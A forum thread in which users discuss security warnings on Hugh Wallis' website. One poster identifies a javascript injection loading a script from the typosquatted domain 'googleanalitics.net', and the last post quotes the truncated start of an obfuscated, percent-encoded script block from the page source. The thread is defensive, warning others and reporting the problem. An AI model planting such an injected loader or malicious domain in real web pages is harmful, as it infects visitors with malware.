What has happened to Hugh Wallis' website ?

[ET in the USA]

I just tried again & it was fine. I just wondered if anyone knew if he had been fighting off invaders or something. Too weird because it wasn't just today. As I said, it has been happening for a month or more, but not every time.
Elaine

[busyglen]

Hi Elaine, I sent you a PM, but checking again, you are using the same approach as me, so don't really know what is happening. Hope it soon sorts itself out for you.

Glenys

[v.wells]

ET - You should delete the link, refresh the page and re-enter it (find the cookie first and also delete that)

[busyglen]

ET - You should delete the link, refresh the page and re-enter it (find the cookie first and also delete that)

Good thinking!

Glenys

[ET in the USA]

Thanks all. Yes I got the PM's & we are all using the same link. Mine had ancestry in the URL too, I guess it reset itself when it changed. Anyway, I just won't panic when I get those messages, I'll close the tab & try again. I don't like it when a website message tells me it is going to eat me for lunch makes me nervous !

Elaine

[Mary Anne]

When I first signed in to Hugh's site, using the URL in your post, I did get a warning from my Norton Security that a high-risk intrusion had been blocked from a known *attack* computer. My IE also indicated that somehting was trying to download and executable image file, and when I googled the text of that message, I came to this site, which describes a *fake* Miscorsoft add-on that wants to highjack your IE: https://msmvps.com/blogs/hostsnews/ar...-the-fake.aspx

Tried the Hugh Wallis site by several other methods (googled it, used my Favourites, etc) and there were no problems with the site, approaching it from that way.

It's like the spam/virus stuff - always there are folks out there *phishing* and they want to highjack your computer...beware, therefore, say I!! (sigh - sad we have to always mistrust...). Keep your security software running and up-to-date!

[jane.harrison.9]

Been using it all week. Not had any problems.
Jane.

[MarkJ]

I haven't noticed anything out of the ordinary before, but after spotting this post, I went and checked.

There IS a problem with Hughs page. If you allow scripts to run by default (which most browsers do), you will find yourself connecting to a quite dodgy sounding page.

As most people will know, the search engine outfit, Google, often run something called google-analytics (google-analytics.com) - which is a fairly standard way for websites to see who has been looking at the page and allows the webmaster to analyse stuff such as the browser used etc. All very basic and not really an issue.

However, as well as the perfectly OK google-analytics, there is also a somewhat iffy script for "googleanalitics.net" - which is NOT Google related and is in fact a very dodgy site, hosted in Hong Kong currently which has - in the past (and perhaps now or in the future) hosted trojan malware.

Just because you "don't have any problems" does not mean that your browser is not downloading a trojan in the background. You are safe as long as you have some means of preventing malicious scripts from running - assuming there is currently malicious content on the googleanalitics.net site. But if your browser happily executes javascript and the dodgy site is carrying a malicious payload - you will be infected.

Not sure if anyone has contacted the Hugh Wallis site about this or not - but I shall fire off an email as soon as I finish this post.

I will state this once again in case anyone is missing the message -

If you access the Hugh Wallis site at the moment, there is a chance that you may be infected with malware. Unless you *know* that your browser does not execute javascript without any further input from you - then do not go there for now.

Mark

Edit: I have sent an email to the site about this javascript injection - I will let you all know once I get a response.
In the meantime, please, please don't pop over to "have a look" unless you are familiar with this type of malware and are using sensible precautions to avoid becoming a victim.

Not often I come across such a blatent js problem as this - for us "techies" it is quite exciting! But for "normal" users - it is not something you want to be playing with.

[ET in the USA]

Glad I sounded the alarm & it wasn't an over reaction.

Mary Anne has quoted the actual warning message pretty closely. I didn't want to go back in & look again to write it down, so paraphrased " you have been infected & it is sucking your brains out. Possible security violation..."

Mark -
How do we know "...your browser is not downloading a trojan in the background. You are safe as long as you have some means of preventing malicious scripts from running - assuming there is currently malicious content on the googleanalitics.net site. But if your browser happily executes javascript and the dodgy site is carrying a malicious payload - you will be infected." ??

I have Vista & AVG Free Edition Version 8.0.138 updated Aug 26 08.
Is there somewhere/some file I should look or just trust that getting the warning means that my browser wasn't going along willingly & so all is OK ?

Elaine

[oxon57]

please don't pop over to "have a look" unless you are familiar with this type of malware and are using sensible precautions to avoid becoming a victim.

Obviously not half as familiar enough as you, Mark, but interested, and confident enough to risk sticking my nose in running Firefox with the very useful "NoScript" extension.
I see what you mean - if I click my little NoScript icon, I can, if I wish, allow both the legitimate "google-analytics.com" script and the potentially dangerous "googleanalitics.net" script. In fact, from previous use, the site runs perfectly well without even allowing the legitimate Google script, so I've never bothered with it and have that blocked too, never mind the other one, which I'd automatically be suspicious of because they can't spell analytics!

As you evidently understand these things properly, though, could you enlighten me on one point?
When I look at the code for the page, the nasty one does not show up. Would I be correct in thinking that it's in the encoded chunk of javascript at the very end, starting:
<!--ab00ecd93a86f0b704ac95cfdda98bf0-><script language=javascript>snexv="%";rfpbn="@3cs@63ript@2 0@6can@67 ...

?